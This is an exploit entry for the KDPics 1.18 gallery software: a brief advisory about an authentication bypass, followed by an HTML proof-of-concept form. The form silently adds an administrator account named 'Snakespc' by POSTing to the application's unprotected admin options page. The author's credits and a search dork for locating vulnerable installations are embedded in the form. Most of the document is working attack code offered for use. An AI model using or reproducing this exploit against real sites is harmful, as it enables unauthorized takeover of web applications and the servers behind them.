KDPics 1.18 - '/admin/index.php' Authentication Bypass

source: https://www.securityfocus.com/bid/38603/info

KDPics is prone to a vulnerability that lets an attacker add an administrative user because it fails to adequately secure access to administrative functionality.

This may allow the attacker to compromise the application and the computer; other attacks are also possible.

KDPics 1.18 is vulnerable; other versions may also be affected. 


<html>
<title>G�n�r� par KDPics v1.18 Remote Add Admin</title>
 
<body link="#00FF00" text="#008000" bgcolor="#000000">
 
<form method="POST" action="http://www.example.com/kdpics/admin/index.php3?page=options&categorie=">
<input type="hidden" name="type" value="add">
<table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080">
<tr>
<td class="top">
<p align="center"><b>User & Pass :Snakespc</b></p>
<p align="center"><b><font face="Comic Sans MS">
<a href="http://www.example.com//index.php?act=idx" style="text-decoration: none">
<font color="#00FF00">[�]Founder:[ Snakespc Email:[email protected] - Site:sec-war.com/cc> ]</p>
[�] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]</p>[�] Dork:"G�n�r� par KDPics v1.18"</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input type="text" name="adminuser" size="30" value="Snakespc"></td>
</tr>
<tr>
<td class="top">
<p align="center"><b>Password:</b></td>
</tr>
<tr>
 
<td height="22">
<p align="center">
<input type="password" name="adminpass" size="30" value="Snakespc"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>" style="font-weight: 700"></td>
</tr>
</form>
</table>
</html>